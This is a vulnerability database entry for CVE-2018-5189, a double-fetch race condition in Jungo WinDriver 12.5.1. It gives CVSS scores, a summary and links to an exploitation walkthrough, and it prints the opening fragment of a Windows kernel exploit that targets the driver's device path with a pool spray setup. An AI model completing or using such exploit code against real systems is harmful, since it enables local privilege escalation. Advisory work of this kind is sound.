
CVE-2018-5189

Published: 11/01/2018 Updated: 17/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Race condition in Jungo Windriver 12.5.1 allows local users to cause a denial of service (buffer overflow) or gain system privileges by flipping pool buffer size, aka a "double fetch" vulnerability.

Vulnerable Product

jungo windriver

Exploits

    // ConsoleApplication1.cpp : Defines the entry point for the console application
    //
    #include "stdafx.h"
    #include <Windows.h>
    #include <winioctl.h>

    #define device L"\\\\.\\WINDRVR1251"
    #define SPRAY_SIZE 30000

    typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
        HANDLE ProcessHandle,
        PVOID *BaseAddress,
        ULONG ZeroBits,
        ...

Github Repositories

Collection of windows kernel exploitation and reversing links

Windows-Kernel-Exploitation-Repo
RUMBLE IN THE JUNGO – A CODE EXECUTION WALKTHROUGH – CVE-2018-5189: www.fidusinfosec.com/jungo-windriver-code-execution-cve-2018-5189/